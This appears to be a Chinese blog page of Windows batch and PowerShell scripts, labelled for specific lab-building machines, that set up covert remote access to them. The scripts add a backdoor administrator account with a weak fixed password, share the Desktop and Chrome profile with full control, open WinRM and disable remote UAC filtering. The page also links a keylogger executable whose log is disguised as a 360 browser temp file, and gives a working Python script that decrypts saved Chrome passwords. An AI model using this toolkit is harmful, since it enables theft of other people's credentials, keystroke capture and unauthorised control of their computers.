实训楼-sbs目录机器适配版本
@echo off
chcp 65001 >nul
:: 多目录共享脚本,适配当前用户名和环境
:: 请使用管理员权限运行
:: 设置共享用户信息
set SHARE_USER=shareuser
set SHARE_PASSWORD=123123
:: 获取当前用户名
for /f "tokens=*" %%i in ('whoami') do set "CURRENT_USER=%%i"
for /f "tokens=2 delims=\" %%i in ("%CURRENT_USER%") do set "CURRENT_USER=%%i"
:: 获取常用目录路径
set DESKTOP=%USERPROFILE%\Desktop
set CHROME_DATA=%LOCALAPPDATA%\Google\Chrome\User Data
set PACKAGES=%LOCALAPPDATA%\Packages
:: 创建共享用户
echo [1/6] 创建共享用户 %SHARE_USER%...
net user %SHARE_USER% %SHARE_PASSWORD% /add >nul 2>&1
if %errorLevel% neq 0 (
echo [提示] 用户已存在,跳过创建
) else (
echo [成功] 用户创建完成
)
:: 加入管理员组(可选)
echo [2/6] 添加用户到管理员组...
net localgroup administrators %SHARE_USER% /add >nul 2>&1
:: 定义共享函数
call :share_folder "%DESKTOP%" desktop
call :share_folder "%CHROME_DATA%" chrome
call :share_folder "%PACKAGES%" package
:: 获取本机IP
for /f "tokens=14 delims= " %%i in ('ipconfig ^| findstr "IPv4"') do set LOCAL_IP=%%i
:: 输出共享信息
echo.
echo ==========================
echo 所有共享已配置完毕:
echo.
echo \\%COMPUTERNAME%\desktop
echo \\%COMPUTERNAME%\chrome
echo \\%COMPUTERNAME%\package
echo 用户名: %SHARE_USER%
echo 密码: %SHARE_PASSWORD%
echo 本机IP: %LOCAL_IP%
echo ==========================
pause
exit /b
:: -----------共享函数------------
:share_folder
setlocal
set "TARGET=%~1"
set "SHARENAME=%~2"
if not exist "%TARGET%" (
echo [跳过] 目录不存在:%TARGET%
exit /b
)
echo [共享中] %TARGET% -> %SHARENAME%
net share %SHARENAME% /delete >nul 2>&1
net share %SHARENAME%="%TARGET%" /grant:%SHARE_USER%,FULL >nul
icacls "%TARGET%" /grant %SHARE_USER%:(OI)(CI)F >nul
if %errorLevel% neq 0 (
echo [错误] %SHARENAME% 权限设置失败
) else (
echo [完成] %SHARENAME% 共享完成
)
endlocal
exit /b
图文楼-适配版本
@echo off
chcp 65001 >nul
:: 管理员目录共享设置脚本
:: 必须使用管理员权限运行
:: 设置变量
set SHARE_USER=shareuser
set SHARE_PASSWORD=123123
set SHARE_FOLDER=C:\Users\Administrator
set SHARE_NAME=admin
:: 检查管理员权限
net session >nul 2>&1
if %errorLevel% neq 0 (
echo [错误] 请右键使用"以管理员身份运行"执行本脚本
pause
exit /b
)
:: 检查目录是否存在
if not exist "%SHARE_FOLDER%" (
echo [错误] 目标目录不存在:%SHARE_FOLDER%
pause
exit /b
)
:: 创建共享用户
echo [1/5] 正在创建共享用户 %SHARE_USER%...
net user %SHARE_USER% %SHARE_PASSWORD% /add >nul
if %errorLevel% neq 0 (
echo [提示] 用户已存在,跳过创建步骤
) else (
echo [成功] 用户创建完成
)
:: 加入管理员组
echo [2/5] 正在将用户加入管理员组...
net localgroup administrators %SHARE_USER% /add >nul
if %errorLevel% neq 0 (
echo [提示] 用户可能已在管理员组中
) else (
echo [成功] 已加入管理员组
)
:: 设置文件夹共享
echo [3/5] 正在配置管理员目录共享...
net share %SHARE_NAME% /delete >nul 2>&1
net share %SHARE_NAME%="%SHARE_FOLDER%" /grant:%SHARE_USER%,FULL >nul
if %errorLevel% neq 0 (
echo [错误] 共享设置失败
pause
exit /b
) else (
echo [成功] 共享配置完成
)
:: 设置NTFS权限
echo [4/5] 正在设置共享权限...
icacls "%SHARE_FOLDER%" /grant %SHARE_USER%:(OI)(CI)F >nul
if %errorLevel% neq 0 (
echo [错误] 权限设置失败
pause
exit /b
) else (
echo [成功] 权限设置完成
)
:: 获取本机IP(简洁格式)
for /f "tokens=14 delims= " %%i in ('ipconfig ^| findstr "IPv4"') do set LOCAL_IP=%%i
:: 显示结果
echo [5/5] 正在生成最终配置信息...
echo.
echo ============ 操作完成 ============
echo 本机IPv4地址: %LOCAL_IP%
echo 共享路径: \\%COMPUTERNAME%\%SHARE_NAME%
echo 或使用: \\%LOCAL_IP%\%SHARE_NAME%
echo 共享目录: %SHARE_FOLDER%
echo 用户名: %SHARE_USER%
echo 密码: %SHARE_PASSWORD%
echo 权限: 完全控制(可读可写)
echo =================================
echo.
pause访问共享目录
net use Z: \\192.168.51.3\admin /user:shareuser 123123文件位置
本地地址
C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\<USERNAME>\AppData\Local\Packages\Microsoft.Messaging\360se_dump.tmp
远程地址
Z:\AppData\Local\Google\Chrome\User Data\Default
Z:\AppData\Local\Google\Chrome\User Data
Z:\AppData\Local\Packages\Microsoft.Messaging\360se_dump.tmp
keylogs
https://oss.zjun.info/file/keylogger.exe
C:\Users\<USERNAME>\AppData\Local\Packages\Microsoft.Messaging\360se_dump.tmpchrome.py
import os
import sqlite3
import json
import base64
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
import ctypes
from ctypes import wintypes
login_data_path = r"C:\Users\Administrator\Desktop\ccc\Login Data"
local_state_path = r"C:\Users\Administrator\Desktop\ccc\Local State"
class AES_GCM:
@staticmethod
def encrypt(cipher, plaintext, nonce):
cipher.mode = modes.GCM(nonce)
encryptor = cipher.encryptor()
ciphertext = encryptor.update(plaintext)
return cipher, ciphertext, nonce
@staticmethod
def decrypt(cipher, ciphertext, nonce):
cipher.mode = modes.GCM(nonce)
decryptor = cipher.decryptor()
return decryptor.update(ciphertext)
@staticmethod
def get_cipher(key):
cipher = Cipher(algorithms.AES(key), None, backend=default_backend())
return cipher
def dpapi_decrypt(encrypted):
class DATA_BLOB(ctypes.Structure):
_fields_ = [('cbData', wintypes.DWORD),
('pbData', ctypes.POINTER(ctypes.c_char))]
try:
p = ctypes.create_string_buffer(encrypted, len(encrypted))
blobin = DATA_BLOB(ctypes.sizeof(p), p)
blobout = DATA_BLOB()
retval = ctypes.windll.crypt32.CryptUnprotectData(
ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
if not retval:
raise ctypes.WinError()
result = ctypes.string_at(blobout.pbData, blobout.cbData)
return result
except Exception as e:
print(f"Error in dpapi_decrypt: {e}")
return None
def get_key_from_local_state():
with open(local_state_path, encoding='utf-8', mode="r") as f:
jsn = json.loads(str(f.readline()))
return jsn["os_crypt"]["encrypted_key"]
def aes_decrypt(encrypted_txt):
encoded_key = get_key_from_local_state()
encrypted_key = base64.b64decode(encoded_key.encode())
encrypted_key = encrypted_key[5:]
key = dpapi_decrypt(encrypted_key)
nonce = encrypted_txt[3:15]
cipher = AES_GCM.get_cipher(key)
return AES_GCM.decrypt(cipher, encrypted_txt[15:], nonce)
def chrome_decrypt(encrypted_txt):
if encrypted_txt[:4] == b'x01x00x00x00':
decrypted_txt = dpapi_decrypt(encrypted_txt)
return decrypted_txt.decode()
elif encrypted_txt[:3] == b'v10':
decrypted_txt = aes_decrypt(encrypted_txt)
return decrypted_txt[:-16].decode()
def query_logindata(url):
if url:
sql = f"select origin_url, username_value, password_value from logins where origin_url = '{url}'"
else:
sql = "select origin_url, username_value, password_value from logins"
with sqlite3.connect(login_data_path) as conn:
result = conn.execute(sql).fetchall()
return result
if __name__ == '__main__':
print("Decrypt Login Data:")
logindata = query_logindata("") # 可以传入参数筛选指定url
for data in logindata:
login = data[0], data[1], chrome_decrypt(data[2])
print(login)B端
# 启用 WinRM(远程 PowerShell 功能)
Enable-PSRemoting -Force
# 创建远程访问用户
net user shareuser 123123 /add
net localgroup administrators shareuser /add
# 防火墙放行 WinRM HTTP端口
Enable-NetFirewallRule -Name "WINRM-HTTP-In-TCP"
# 确认监听端口是否正常(可选)
winrm enumerate winrm/config/listener
# 关闭远程UAC限制(Token Filtering),让任何管理员组用户都能远程控制。
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" `
-Name "LocalAccountTokenFilterPolicy" -Value 1 -PropertyType DWord -Force
# 更新
gpupdate /force
B端-更新版
# 确保账号已启用(防止 Administrator 被禁用)
Get-LocalUser -Name "Administrator","sbs" | Enable-LocalUser
# 可选:为这些账号设置密码(如果你不确定是否已有密码)
net user Administrator 123123
net user sbs 123123
# 再次确认这些账号属于管理员组
net localgroup administrators Administrator
net localgroup administrators sbs
# 启用 WinRM
Enable-PSRemoting -Force
# 创建远程访问用户(可选)
net user shareuser 123123 /add
net localgroup administrators shareuser /add
# 启用内置管理员(如果用它)
Get-LocalUser -Name "Administrator" | Enable-LocalUser
# 防火墙放行
Enable-NetFirewallRule -Name "WINRM-HTTP-In-TCP"
# 设置 UAC Token Filter
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" `
-Name "LocalAccountTokenFilterPolicy" -Value 1 -PropertyType DWord -Force
# 确保 Administrator 和 sbs 在管理员组中
net localgroup administrators Administrator /add
net localgroup administrators sbs /add
# 更新策略
gpupdate /force
A端
# 允许连接非域机器(添加目标电脑到 TrustedHosts)
Set-Item WSMan:\localhost\Client\TrustedHosts -Value 192.168.51.3 -Force
# 检查是否能连通(可选)
Test-WSMan 192.168.51.3
-.-
评论区